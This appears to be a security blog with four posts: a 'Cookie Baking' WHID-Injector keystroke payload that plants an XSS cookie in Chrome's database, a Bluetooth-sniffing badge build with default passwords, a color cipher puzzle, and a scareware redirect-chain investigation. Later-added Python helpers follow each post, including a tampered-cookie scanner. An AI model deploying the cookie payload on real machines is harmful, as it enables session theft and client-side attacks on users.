Tuesday, December 25, 2018

COOKIE BAKING: WHID-Injected Cookies

Baking up some holiday WHID-Injected Cookies...


Just in time for the holidays...LostRabbitLabs recently updated the cookie fuzzing tool "Anomalous Cookie" and rabbit-holed its way into a new attack vector called "Cookie Baking".

What is Cookie Baking?
Cookie Baking is the technique of creating or modifying a cookie in a user's local Cookie Jar. This includes stuffing it with malicious payloads, affiliate tags, fuzz-strings and more. Cookie Baking also provides a delivery method for targeting 'Self-XSS' vulnerabilities, allowing them to be exploited.


Epic Holiday Cookie Baking...

If you would like to read more about 'Cookie Baking' and how it has been recently used, check out the blog "Epic Holiday Cookie Baking" at the Coalfire Labs website (link below):



Let's take the example XSS vulnerability discussed from "Epic Holiday Cookie Baking" and create a WHID Injector payload that can be used in our ingredients list.


MERRY CHRISTMAS from LostRabbitLabs...below you will find the full recipe for 'WHID-Injected Cookies'. >8-P



.-= WHID-Injected Cookies =-.

INGREDIENTS:
---------------------------------------------
  1.  1 x WHID-Injector (https://github.com/whid-injector/WHID)
  2.  1 x 'target' computer (in our 'case'...a Windows system)
  3.  1 x Vulnerable Cookie (using '_epicSID' from the example above)
  4.  1 x 'CookieBaker-WHID.txt' payload file (found below)

OPTIONAL:
      1 x WHID-Injector to Motherboard adapter (WI-to-MB), pictured below

NOTE: If you can 'Hide Yo' WHID' inside the 'target case', this will add persistence to your 'Cookie Baking'!

=============================================
=============================================

 'CookieBaker-WHID.txt'
  (save contents below to file - to be uploaded to your WHID Injector)

=============================================
=============================================

Delay
Delay
Delay
Press:131+114
PrintLine:powershell Start-Process cmd.exe -Verb runAs
Delay
Press:130+121
Delay
PrintLine:taskkill /im chrome.exe* /f
Delay
PrintLine:powershell
Delay
PrintLine:Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force
Delay
PrintLine:Install-Module PSSQLite -Force
Delay
PrintLine:set-executionpolicy remotesigned
Delay
PrintLine:Import-Module PSSQLite
Delay
PrintLine:$Database = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Cookies"
Delay
PrintLine:$query = "INSERT INTO cookies (creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,encrypted_value,firstpartyonly) VALUES ('13186874114525467','.epicgames.com','_epicSID','kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3efbu5ubf6b6ce405264df19ea1394b58aba4d0','/','0','0','1','13386874114525467','0','1','0',NULL,'0')"
Delay
PrintLine:Invoke-SqliteQuery -DataSource $Database -Query $query
Delay
PrintLine:exit
Delay
PrintLine:exit

=============================================
=============================================

DIRECTIONS:
---------------------------------------------
  1. Plug 'WHID-Injector' into 'target' system
  2. Connect to WIFI network on pre-configured access-point of WHID-Injector
  3. Navigate to http://192.168.1.1 (or your custom pre-configured network)
  4. Choose 'Upload Payload' and select our newly created 'CookieBaker-WHID.txt' file
  5. From the main menu choose 'CookieBaker-WHID.txt' from the payload list
  6. Click on 'Run Payload' button to run Cookie Baker on target system
  7. Target exploited. Eat carrots. The cookie payload above shows a Proof-of-concept XSS injection attack vector and payload but you will need to create the full working payload yourself! Will you steal session cookies, BeEF hook them or create a more clever client-side attack not yet seen?
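Added example (not from the post or the Anomalous Cookie tool): a defender-side check over the same Chrome cookie table the payload writes to. It rebuilds the table in memory with the columns from the INSERT above, loads one normal cookie and the baked '_epicSID' row, and flags rows whose URL-decoded value contains script markup, whose plaintext value has no encrypted_value, or whose has_expires/is_persistent flags disagree. Assumptions: Chrome on Windows stores the DPAPI ciphertext in encrypted_value and leaves value empty, and it writes has_expires and is_persistent from the same expiry.

```python
import re
import shutil
import sqlite3
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Column list copied from the INSERT statement in the payload above.
COOKIE_COLUMNS = ("creation_utc", "host_key", "name", "value", "path",
                  "expires_utc", "is_secure", "is_httponly",
                  "last_access_utc", "has_expires", "is_persistent",
                  "priority", "encrypted_value", "firstpartyonly")

# Markup that has no business in a session identifier; matched after
# URL-decoding so '%3cscript%3e' and '<script>' are treated alike.
MARKUP_RE = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe)\b|javascript:|\bon[a-z]+\s*=",
    re.IGNORECASE)

# The value the payload above writes into '_epicSID'.
BAKED_VALUE = ("kpjak%3c%2fscript%3e%3cScRiPt%3ealert(1)%3c%2fScRiPt%3e"
               "fbu5ubf6b6ce405264df19ea1394b58aba4d0")


def open_sample_jar():
    """Constructed in-memory cookie table: one normal Chrome-on-Windows cookie
    (empty value, ciphertext in encrypted_value) and the baked '_epicSID' row
    with exactly the column values the payload inserts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE cookies (%s)" % ", ".join(COOKIE_COLUMNS))
    rows = [
        (13186874114525000, ".example.com", "sid", "", "/", 13200000000000000,
         1, 1, 13186874114525000, 1, 1, 0, b"\x01\x00\x00\x00constructed-blob", 0),
        (13186874114525467, ".epicgames.com", "_epicSID", BAKED_VALUE, "/", 0,
         0, 1, 13386874114525467, 0, 1, 0, None, 0),
    ]
    conn.executemany("INSERT INTO cookies VALUES (%s)" % ",".join("?" * 14), rows)
    return conn


def scan_cookie_jar(conn):
    """Return [(host_key, name, reasons)] for rows that look hand-written
    rather than stored by Chrome itself."""
    findings = []
    sql = ("SELECT host_key, name, value, encrypted_value, has_expires, "
           "is_persistent FROM cookies")
    for host, name, value, enc, has_expires, persistent in conn.execute(sql):
        reasons = []
        if MARKUP_RE.search(unquote(value or "")):
            reasons.append("script markup in cookie value")
        # Assumption: Chrome on Windows keeps the DPAPI ciphertext in
        # encrypted_value and leaves value empty, so plaintext here is foreign.
        if value and not enc:
            reasons.append("plaintext value with NULL encrypted_value")
        # Assumption: Chrome derives both flags from the same expiry, so a
        # hand-written row is the usual reason for them to disagree.
        if bool(has_expires) != bool(persistent):
            reasons.append("has_expires/is_persistent disagree")
        if reasons:
            findings.append((host, name, reasons))
    return findings


def scan_cookie_file(path):
    """Scan a copy of an on-disk Cookies database (Chrome locks the live file
    while it runs, so always work from a copy)."""
    with tempfile.NamedTemporaryFile(suffix=".sqlite", delete=False) as tmp:
        copy = tmp.name
    shutil.copyfile(path, copy)
    conn = sqlite3.connect(Path(copy).as_uri() + "?mode=ro", uri=True)
    try:
        return scan_cookie_jar(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    for host, name, reasons in scan_cookie_jar(open_sample_jar()):
        print(host, name, "; ".join(reasons))
```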


Next Steps...


  1. Update 'Anomalous Cookie' as needed with better payloads/techniques
  2. Create Metasploit module for 'Cookie Baking' framework
  3. Catalog all known vulnerable cookies and create shared database
  4. Investigate 'Affiliate Fraud' possibilities




                                           ...and a Happy New Year!



Saturday, October 13, 2018

DERBYCON VIII: Bluetooth DeMystifier

How to make a wearable Raspberry Pi...


LostRabbitLabs created five (5) 'Bluetooth DeMystifiers' and brought them to DerbyCon to share. This page will serve as the how-to and manual for those who have the badge and those who would like to build one. All parts needed to build one along with instructions on how to use it will be listed below. If you would like a copy of the original SDCard image (RaspberryPI Wireless Zero) let me know and I will provide the link. Code will be posted to our Github soon.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
What is a Bluetooth DeMystifier?
Using a Raspberry PI Zero Wireless tucked in a bag (making it a 'Hacky Sack' - thank you pancho for the great name)...it is a bluetooth enumerator, logger, identifier, sniffer, collector & plotter with ssh & web interfaces for admin access. With the DeMystifier you can...identify bluetooth/BLE devices around you, plot their signals over time providing real-time proximity data, and collect stats on Top Mac Addresses and Vendors observed. This can assist with locating lost devices, detecting if you are being followed, and give some insight into the Bluetooth Darknet that exists all around us.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

What you will need:
1. Raspberry PI Wireless Zero
2. Adafruit PiTFT 2.2" HAT Mini Kit - 320x240 2.2"
3. GPIO headers (for connecting PI to PiTFT)
4. Adafruit PowerBoost 1000C & one (1) on/off switch
5. 3.7v 2000mAh Lithium Ion Battery
6. One small leathery bag & Paracord



Back and front view of DeMystifier before it goes in the bag! Notice the four (4) buttons on the front below the screen!

Putting things together is pretty easy. Solder headers onto the Raspberry Pi. Solder the PiTFT to the headers (leaving room for access to the microUSB ports on the PI). Connect power wires from the Powerboost to the Raspberry PI and attach the battery. Slide into the bag and loop paracord through the bag ties. Leather-punky...and done!



How to use:
1. Charge battery (or use microUSB power while charging)
2. Turn on/off switch to ON position (located on back of badge)
3. Device boots up! You should see output and boot-up images (shown below) on the screen followed by the DerbyCon VIII splash screen (pictured above). Be patient, as the badge may take 1-2 minutes to boot up completely.


4. Using the four (4) buttons on the front of the badge, you can access different bluetooth data being collected/observed.

BUTTON 1:
Displays a graph of the Top 10 most observed Bluetooth Mac Addresses over time. This shows patterns in observed bluetooth traffic, devices and the people/objects who control them. Use for Red-Teaming, Blue-Teaming, Purple-Teaming, Asset management, and curiosity!





BUTTON 2:
Pressing this button will show statistics around total Mac Addresses, vendors and connections observed along with a listing of all devices observed in the last 60 seconds.



The Bluetooth DeMystifier uses the open source software package 'Bluetoothctl' to provide some of the data seen in this view.






BUTTON 3:
This shows a real-time, enriched view (in the CSV format) of bluetooth/BLE signals observed complete with timestamp, vendor OUI lookup, and leaked strings.



BUTTON 4:
The Bluetooth DeMystifier uses the open source software package 'hcitool' to provide some of the data seen in this view. It provides real-time BLE sniffing. Occasionally the command 'hcitool lescan' displays an I/O error message. Just press the button again...and wish for the best!





How to access the SSH and WEB interfaces:
In order to access the SSH and Web interfaces you will need to modify the existing 'wpa_supplicant.conf' file to use your own wireless network. This can be achieved by mounting the sdcard and modifying the "/etc/wpa_supplicant/wpa_supplicant.conf" file.

wpa_supplicant.conf:
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1

network={
 ssid="YOUR_WIFI_SSID"
 psk="YOUR_WPA_KEY"
}

------------------------------------------------
Once your Bluetooth DeMystifier is online, you can log in over SSH using the steps below.

SSH LOGIN:


1. Log in to Raspberry PI using the user 'pi2' and the password 'derbycon'
2. Gain root privileges using the command 'su -' and then using 'derbycon' as the password.
3. All data and important files are in '/home/pi/installs'.
4. Factory reset the DeMystifier (clearing out all bluetooth stats and starting over) by running '/home/pi/installs/clean.sh' and rebooting.

------------------------------------------------

WEB ACCESS:
The web interface for 'Bluetooth DeMystifier' provides additional graphs, logs, and ability to plot any Mac Address you request. Available data includes...

  • Bluetooth Stats - Macs, Vendors, Strings
  • All Discovered Devices (Name/Mac)
  • Discovered Devices Last 5 Minutes (Name/Mac)
  • CSV Version of Log Data
  • Top 10 MACADDRS - Last 10 Minutes
  • Top 10 MACADDRS - All-Time
Sample CSV output data shown below...

Use the '/home/pi/installs/tags.txt' file to create MAC-to-TAG translations as well as plot any Mac Address using the request URL below:

http://YOUR_IP_ADDRESS:1337/?macaddr=01:02:03:04:05:06
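An added example (not the DeMystifier's own code, which the post says will be published later) of the enrichment the button views describe: it parses 'hcitool lescan' style output, attaches an OUI vendor and a tags.txt tag to each sighting, and answers the Top-10, last-60-seconds and CSV views. Assumptions: tags.txt holds one 'MAC,TAG' per line, the OUI table is a constructed placeholder, and the scan lines are constructed samples.

```python
import csv
import io
import re
from collections import Counter

LESCAN_LINE = re.compile(r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+(.*)$")
# Constructed OUI table (first three octets -> vendor). A real build would
# load the IEEE OUI list; these prefixes and vendor names are placeholders.
OUI_TABLE = {"AA:BB:CC": "ExampleVendor-A", "DD:EE:FF": "ExampleVendor-B"}


def parse_lescan(text):
    """Collapse 'hcitool lescan' style output into one (mac, name) per device.
    lescan prints an address once as '(unknown)' and again with its name, so
    the named line wins; the 'LE Scan ...' header line is skipped."""
    devices = {}
    for line in text.splitlines():
        m = LESCAN_LINE.match(line.strip())
        if not m:
            continue
        mac, name = m.group(1).upper(), m.group(2).strip()
        name = "" if name == "(unknown)" else name
        if name or mac not in devices:
            devices[mac] = name
    return list(devices.items())


def parse_tags(text):
    """tags.txt format is not given on the page; assumed 'MAC,TAG' per line."""
    tags = {}
    for line in text.splitlines():
        if line.startswith("#") or "," not in line:
            continue
        mac, tag = line.split(",", 1)
        tags[mac.strip().upper()] = tag.strip()
    return tags


class Sightings:
    """Accumulates enriched sightings and answers the badge's button views."""

    def __init__(self, tags=None):
        self.rows = []  # (timestamp, mac, name, vendor, tag)
        self.tags = tags or {}

    def add_scan(self, ts, lescan_text):
        for mac, name in parse_lescan(lescan_text):
            vendor = OUI_TABLE.get(mac[:8], "unknown")
            self.rows.append((ts, mac, name, vendor, self.tags.get(mac, "")))

    def to_csv(self):
        """BUTTON 3 view: enriched CSV with timestamp, vendor and tag."""
        buf = io.StringIO()
        writer = csv.writer(buf)
        writer.writerow(["timestamp", "mac", "name", "vendor", "tag"])
        writer.writerows(self.rows)
        return buf.getvalue()

    def top_macs(self, n=10, since=None):
        """BUTTON 1 / web view: most-seen addresses, optionally since a timestamp."""
        counts = Counter(r[1] for r in self.rows if since is None or r[0] >= since)
        return counts.most_common(n)

    def seen_within(self, now, seconds=60):
        """BUTTON 2 view: addresses observed within the last `seconds`."""
        return sorted({r[1] for r in self.rows if now - seconds <= r[0] <= now})


# Constructed scans: (unix timestamp, lescan output captured at that time).
SAMPLE_SCANS = [
    (0, "LE Scan ...\nAA:BB:CC:00:00:01 (unknown)\nAA:BB:CC:00:00:01 Hacky Sack\n"
        "DD:EE:FF:00:00:02 (unknown)\n"),
    (30, "LE Scan ...\nAA:BB:CC:00:00:01 Hacky Sack\n11:22:33:44:55:66 (unknown)\n"),
    (100, "LE Scan ...\nAA:BB:CC:00:00:01 Hacky Sack\n"),
]
SAMPLE_TAGS = "# mac,tag\nAA:BB:CC:00:00:01,my-watch\n"


def demo():
    s = Sightings(parse_tags(SAMPLE_TAGS))
    for ts, text in SAMPLE_SCANS:
        s.add_scan(ts, text)
    return s
```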


Thank you DerbyCon!
It was a great DerbyCon and I can't wait to go back next year. Great staff, family and local hospitality (not to mention the great food and drink). To many more!


Wednesday, August 16, 2017

DIGITAL ALCHEMY: Colors to IP Addresses

Crypto challenge fun for everyday use...



CRYPTO CHALLENGES encourage us to think about things in ways we normally don't. They challenge our brains and intellect to treat a certain data point in a unique fashion often outside the realm of 'normalcy'. I believe these efforts help us evolve our awareness and creativity, and sharpen our techniques regardless of our craft. Let's take the below for example....

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


There's no place
LIKE HOME!!


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

There is a 'hidden location' embedded in the above. At first glance you may think the image could hold EXIF data or Steganography. In this case however the twist comes in the form of chosen TEXT COLORS for the 'anomalous words' in the sentence. Let's take a look at the raw HTML code:

<span style="color: #7f0000;">LIKE</span>
<span style="color: #000001;">HOME</span>

The 2 pieces of information that "stand out" are the values used for text color:
LIKE (text color used) = #7f0000 (r=127, g=0, b=0)
HOME (text color used)  = #000001 (r=0, g=0, b=1)


SOLUTION TECHNIQUE:
If we take the HEX values for the 2 different colors (in the correct order) and apply the proper bit-shifting/truncation, we can translate the value back into an IP ADDRESS. In our example...

1st color: #7f0000
-- Remove the LAST 2 hex digits (one byte) from the value. New value = 7f00

2nd color: #000001
-- Remove the FIRST 2 hex digits (one byte) from the value. New value = 0001

Now concatenate (left to right) the first 'new value' & the second 'new value' to get the final HEX:
7f000001 (or #7f000001)

-----
If we convert this value from HEX to DECIMAL...
(http://www.binaryhexconverter.com/hex-to-decimal-converter)
(http://www.rapidtables.com/convert/number/hex-to-decimal.htm)

RESULT: 2130706433

-----
If we convert the DECIMAL to an IP ADDRESS...
(https://www.browserling.com/tools/dec-to-ip):


RESULT = 127.0.0.1 (http://whatismyipaddress.com/localhost)

The 'hidden location' turned out to be the IP ADDRESS for HOME/LOCALHOST: 127.0.0.1.


NOTE: We can also use the websites below to convert from HEX directly to an IP ADDRESS.
(http://ncalculators.com/digital-computation/ip-address-hex-decimal-binary.htm)
(http://www.kloth.net/services/iplocate.php)






CREATING THE '2-COLOR IP CIPHER':

1) First we start out by choosing our target IP ADDRESS. For this example let's use '192.168.123.234'.


2) We need to convert our IP ADDRESS to a HEX value. Let's use the site below:
http://www.kloth.net/services/iplocate.php

New HEX value: C0A87BEA


3) We need to split this value into 2 unique RGB HEX values by using the method below...

To create the 1st color:
Remove the LAST 2 hex digits (one byte) from the HEX value: C0A87B (or #C0A87B)

To create the 2nd color:
Remove the FIRST 2 hex digits (one byte) from the HEX value: A87BEA (or #A87BEA)

Let's use the site below to validate the 2 unique colors we just created:
http://www.rapidtables.com/convert/color/hex-to-rgb.htm

 

Notice the 'rgb' values above as they should look familiar. It should be apparent as to why the bit-shift/truncation needs to happen to construct a usable IP ADDRESS from the '2-COLOR IP CIPHER'. Now we can leave a 'secret message' with a clue leading to the next rendezvous point.


4) Create a secret message using the 2 unique colors we just created:

Secret Message (which we of course know is '192.168.123.234'):
LOOK HERE!

HTML CODE for 'LOOK HERE':
<span style="color: #c0a87b;">LOOK</span> <span style="color: #a87bea;">HERE</span>
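The decode and encode steps above as an added example (not code from the post): the standard-library ipaddress module does the HEX/DECIMAL/dotted-quad conversions the linked websites were used for, and the decoder also checks that the two colours share their middle bytes, which is exactly why the truncation step works.

```python
import ipaddress
import re

COLOR_RE = re.compile(r"color:\s*#([0-9a-fA-F]{6})")


def ip_to_colors(ip):
    """Encode an IPv4 address as the two 6-digit colours of the cipher.
    The address is four bytes AABBCCDD: colour 1 is AABBCC (last byte
    dropped) and colour 2 is BBCCDD (first byte dropped)."""
    hex8 = "%08x" % int(ipaddress.IPv4Address(ip))
    return "#" + hex8[:6], "#" + hex8[2:]


def colors_to_ip(first, second):
    """Decode: keep the first 4 hex digits of colour 1 and the last 4 of
    colour 2, concatenate, and read the 32-bit result as an address."""
    a = first.lstrip("#").lower()
    b = second.lstrip("#").lower()
    if len(a) != 6 or len(b) != 6:
        raise ValueError("each colour must be a 6-digit hex value")
    # Bytes BB and CC appear in both colours; if they differ, the pair was
    # not produced by this cipher (or one colour was altered on the page).
    if a[2:] != b[:4]:
        raise ValueError("colours do not share their middle bytes")
    return str(ipaddress.IPv4Address(int(a[:4] + b[2:], 16)))


def decode_html(html):
    """Pull the first two span colours out of the HTML, in document order."""
    colours = COLOR_RE.findall(html)
    if len(colours) < 2:
        raise ValueError("need two coloured words")
    return colors_to_ip(colours[0], colours[1])


def encode_html(ip, words=("LOOK", "HERE")):
    """Produce the two-span 'secret message' markup for an address."""
    c1, c2 = ip_to_colors(ip)
    return ('<span style="color: %s;">%s</span> '
            '<span style="color: %s;">%s</span>' % (c1, words[0], c2, words[1]))


if __name__ == "__main__":
    print(encode_html("192.168.123.234"))
    print(decode_html(encode_html("192.168.123.234")))
```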


=================================================

One more special message to go, then I'm done & I can go home...


CALL ME!



Monday, July 3, 2017

DOMAIN $HADOWING: Sorting Victims from Actors

More GOOGLE $EO Rabbitholin' fun...



Threat Hunting & Rabbitholin' are a lot like the "Choose your own adventure" books we had as kids (late 70s/early 80s). Before access to video games, Internet & most modern electronics we had books/words and our brain. We were the CPU and we processed the programs/code (books) but made it dynamic (and arguably more valuable) with our logic, reasoning and choices made in order to get the "best" ending or result.

Let's use the same methodology used in "experiencing" the old-school CYOA books to rabbit-hole for threats. We will also use similar methodologies from the last BLOG POST "GOOGLE $CAMS: $EO VooDoo".

1. SEARCH GOOGLE FOR TOPIC OF INTEREST. Here's the first choice you have in this adventure! Let's try to find links to a rogue Android APK download for a "Wells Fargo" branded mobile application (using the search terms below along with the PAST 24 Hours search parameter):

download wells fargo bank app android


2. EXAMINE THE GOOGLE SEARCH RESULTS ...
When checking the results you should be looking for any anomalies and/or anything that doesn't look 'normal'. In our results...the 2nd result looks odd...

SEARCH RESULT:
[DOC] Ellens emoji exploji itunes - 18 hours ago

CLICKING LINK LEADS TO:
hXXp://wffw[.]jenniferashe[.]net/BQ




3. CLICK ON THAT LINK!!
Be sure you are using a safe environment to do your research and not infecting yourself unintentionally. Unsafe Rabbitholin' should be avoided unless that is yer intent! On to the clickin'...





Upon clicking the link we are presented with a familiar looking animated loading splash page (from our previous BLOG POST):


Meanwhile, in the background, the browser is being redirected to multiple websites (through a redirect chain) where eventually we will end up on a landing page of unknown intent, content & threat level. Guess we'll find out any second now!


OMFG!@#$ "Your Browser have been hijacked or hacked."
-------------------------------------------------------------------------------------

FINAL LANDING PAGE:
hXXp://www[.]plaza-place-on[.]us/

SCAREWARE & FAKE TECH SUPPORT SCAMS!     
-CLICK TO ZOOM-
"Windows Firewall Security Damaged by Exploit.SWF.db Virus. A Suspicious Connection Was Trying To Access Your Logins, Banking Details & Tracking Your Internet Activity. Windows Security Center & Firewall Sevices are Disabled. Error Code 0x8024402c.

WARNING! Your Hard drive will be DELETED if you close this page. You have a ZEUS virus! Please call Support Now!. Call Toll-Free:+1-(866)-331-7691 To Stop This Process"

NEW DATA POINTS OBSERVED:
Exploit.SWF.db
0x8024402c
1-(866)-331-7691
www[.]plaza-place-on[.]us


4. REVIEW THE REQUEST SEQUENCE/REDIRECT CHAINS
We will now examine the sequence of events & connections from the initial request to the final loading of the view from plaza-place-on[.]us.


302 hXXp://wffw[.]jenniferashe[.]net/BQ
IP ADDR: 95.211.230[.]116

302 hXXp://xmlfeed[.]info:8080/click?
IP ADDR: 216.172.56[.]21

302 hXXp://64.15.72[.]104/click[.]php?
IP ADDR: 64.15.72[.]104

302 hXXp://64.15.72[.]104/click_second_new3[.]php
IP ADDR: 64.15.72[.]104

302 hXXp://go[.]quali-bid[.]com:17777/click[.]php?
IP ADDR: 64.15.72[.]46

200 hXXp://www[.]metal-rewards[.]us/
IP ADDR: 198.54.115[.]15

200 hXXp://www[.]plaza-place-on[.]us/
IP ADDR: 198.54.115[.]15


NEW DATA POINTS OBSERVED:

UNIQUE HOSTS
wffw[.]jenniferashe[.]net
xmlfeed[.]info:8080
64.15.72[.]104
go[.]quali-bid[.]com:17777
www[.]metal-rewards[.]us
www[.]plaza-place-on[.]us

UNIQUE IP ADDRS
95.211.230[.]116
216.172.56[.]21
64.15.72[.]104
64.15.72[.]46
198.54.115[.]15



!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

So...where do we go from here? We definitely have several NEXT PIVOT data points, and where you begin is totally up to you (with the goal being, of course, to not get lost in the rabbit-hole). Today, I will start with WHOIS/IP Lookups of the INITIAL REQUEST URI and the FINAL LANDING PAGE presented and then move on from there...

STEP 1 - WHOIS/IP LOOKUPS FOR 'JENNIFERASHE[.]NET'

HOST: wffw[.]jenniferashe[.]net
NSLOOKUP: 95.211.230[.]116
ASN: AS60781 (LEASEWEB NL)

DOMAIN: jenniferashe[.]net
NSLOOKUP: 50.62.248.1
ASN: AS26496 (GO-DADDY-COM-LLC Scottsdale US)

WHOIS: https://www.whois.com/whois/jenniferashe.net

Registrar URL: http://www.godaddy.com
Registrant Name: John Mekrut
Registrant Organization: The Balanced Brain
Name Server: NS05.DOMAINCONTROL.COM
Name Server: NS06.DOMAINCONTROL.COM


WEBSITE SNAPSHOT FOR 'JENNIFERASHE[.]NET':

It appears this default 'Hello world' webpage was updated on 5/30/2017 using the WordPress framework.

<title>Tips for today &#8211; Just another WordPress site</title>

<a href="http://jenniferashe.net/2017/05/30/hello-world/">Hello world!</a>


------------------------------------------------
STEP 2 - WHOIS/IP LOOKUPS FOR 'PLAZA-PLACE-ON[.]US'

DOMAIN: plaza-place-on[.]us
NSLOOKUP: 198.54.115[.]15
ASN: AS22612 (NAMEC-4 Los Angeles US)

WHOIS: https://www.whois.com/whois/plaza-place-on.us

Registrant Name: Aniket Kumar
Registrant Email: kaniket239@gmail.com
Registrant Organization: Microlive
Name Server: DNS1.NAMECHEAPHOSTING.COM
Name Server: DNS2.NAMECHEAPHOSTING.COM

DEJA-VU! We just saw this ACTOR in our last rabbitholin' adventure where traffic was being driven to another malicious page ON THE SAME IP ADDRESS: big-shot-seller[.]us.


------------------------------------------------
STEP 3 - QUICK DIVE INTO THE 'WFFW[.]JENNIFERASHE[.]NET/BQ' WEBSITE

SNAPSHOT OF WEBPAGE WITHOUT MALICIOUS CODE LOADING
(NOTE: This version of site is from GOOGLE CACHE)


Now let's look at the source code...

NEW DATA POINTS OBSERVED:
Taking a look at the source code reveals more URLS, DOMAINS & POSSIBLY ADDITIONAL 'DOMAIN SHADOWING' VICTIMS.


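An added example (not code from the post) of the sorting this post is about: it parses a redirect-chain note in the post's own 'STATUS URL / IP ADDR' format (refanging hXXp:// and [.]), reports the unique hosts and IPs, and groups hostnames by apex so that a domain carrying several short random labels stands out as a likely shadowed victim, while actor-owned landing domains appear with a single ordinary label. Assumptions: the apex is the last two labels (no public-suffix list), and the chain and hostnames are constructed samples using RFC 5737 addresses.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

CHAIN_RE = re.compile(r"^(\d{3})\s+(\S+)$")
IP_RE = re.compile(r"^IP ADDR:\s*(\S+)$")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
RANDOM_LABEL = re.compile(r"^[a-z]{3,5}$")
# Labels a legitimate site commonly uses; never counted as shadow labels.
COMMON_LABELS = {"www", "mail", "blog", "shop", "cdn", "api", "app", "dev"}


def refang(text):
    """Turn the hXXp:// and [.] defanging used in the post back into real strings."""
    return re.sub(r"h[xX]{2}p", "http", text).replace("[.]", ".")


def parse_chain(text):
    """Parse 'STATUS URL' lines followed by 'IP ADDR: x' lines into
    (status, host[:port], ip) hops, in order."""
    hops, status, url = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = CHAIN_RE.match(line)
        if m:
            status, url = int(m.group(1)), refang(m.group(2))
            continue
        m = IP_RE.match(line)
        if m and url:
            hops.append((status, urlparse(url).netloc, refang(m.group(1))))
            status, url = None, None
    return hops


def unique_hosts_and_ips(hops):
    """The 'NEW DATA POINTS' summary: sorted unique hosts and sorted unique IPs."""
    return sorted({h for _, h, _ in hops}), sorted({ip for _, _, ip in hops})


def split_host(host):
    """Return (apex, subdomain labels); bare IPv4 hosts yield (None, []).
    Assumption: the apex is the last two labels, so co.uk-style suffixes
    are not handled."""
    name = host.split(":")[0].lower()
    if IPV4_RE.match(name):
        return None, []
    parts = name.split(".")
    return ".".join(parts[-2:]), parts[:-2]


def find_shadowed(hosts, min_labels=2):
    """Apexes seen with at least `min_labels` distinct short random-looking
    leftmost labels: the signature of a shadowed (victim) registrant account."""
    labels = defaultdict(set)
    for host in hosts:
        apex, subs = split_host(host)
        if apex and subs:
            label = subs[0]
            if RANDOM_LABEL.match(label) and label not in COMMON_LABELS:
                labels[apex].add(label)
    return {apex: sorted(ls) for apex, ls in labels.items() if len(ls) >= min_labels}


# Constructed sample in the post's note format (RFC 5737 test addresses).
SAMPLE_CHAIN = """
302 hXXp://wffw[.]victim-one[.]net/BQ
IP ADDR: 192.0.2[.]10

302 hXXp://feed[.]example[.]info:8080/click?
IP ADDR: 198.51.100[.]21

200 hXXp://www[.]actor-landing[.]us/
IP ADDR: 203.0.113[.]15
"""

# Constructed hostnames: two apexes with random labels, two actor domains, one IP.
SAMPLE_HOSTS = [
    "wffw.victim-one.net", "kdy.victim-one.net", "vxkt.victim-one.net",
    "sjq.victim-two.com", "ctu.victim-two.com",
    "www.actor-landing.us", "go.actor-tds.com:17777", "203.0.113.15",
]
```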

NEW DOMAIN DETECTED (BUYSOFTWAREAPPS[.]COM)!!
hXXp://www[.]buysoftwareapps[.]com/shop/itunes-2/ellens-emoji-exploji-warner-bros/

BUY! Button links to:
hXXps://itunes[.]apple[.]com/us/app/ellens-emoji-exploji/id1137689929?mt=8&uo=2&at=11lrD2

Is this Affiliate Fraud?!?! NEW RABBITHOLE DETECTED!


AND HERE'S THE "ELLEN EMOJI EXPLOJI ITUNES" CONNECTION FROM THE ORIGINAL SEARCH RESULT:
[DOC] Ellens emoji exploji itunes - 18 hours ago




!!!!!!    CHOOSE YOUR OWN ADVENTURE TIME    !!!!!!

This rabbit-hole is starting to get a bit crazy. Let's re-group and analyze our current finds and plan the next couple of steps. To review...

1. Searching for Wells Fargo Android mobile app on GOOGLE leads to suspicious LINK.

2. Clicking on suspicious LINK leads to possible malicious traffic rotators/directors...

302 hXXp://xmlfeed[.]info:8080/click - 216.172.56[.]21

302 hXXp://64.15.72[.]104/click[.]php - 64.15.72[.]104

302 hXXp://go[.]quali-bid[.]com:17777/click[.]php? - 64.15.72[.]46


3. ...where these Traffic Rotators/Directors lead the user to websites where SCAREWARE/FAKE TECH SUPPORT content is loaded to user.

So far...some scary looking stuff but nothing major. Let's go for more INFO GATHERING around the original suspicious LINK and see if we can't hook into something juicier!

NEXT STEPS:
Re-crawl the original URL four more times to generate additional interesting finds (Drive-by Malware, APK downloads, Spearphishing, etc).



STEP 5 - RE-CRAWL THE INITIAL URL
Below we document the process and our findings from the 4 new requests made to the 'hXXp://wffw[.]jenniferashe[.]net/BQ' webpage. This INFO GATHERING will provide us with additional data points around the observed "SEO Campaign(s)".

------------------------------------------------

REQUEST #1 - LANDING PAGE & SEQUENCE:
1. Clicking the link 'hXXp://wffw[.]jenniferashe[.]net/BQ' redirects us through 4 different domains and then to the final landing page below.

FINAL LANDING PAGE:
hXXp://www[.]autopartswarehouse[.]com/linkshare/?apwcid=G1225939187W491258f3acead&siteID=dWQsD5Zt_Zs-o.uT.

REDIRECT SEQUENCE:
1. go[.]quali-bid[.]com:17777 | 64.15[.]72[.]46
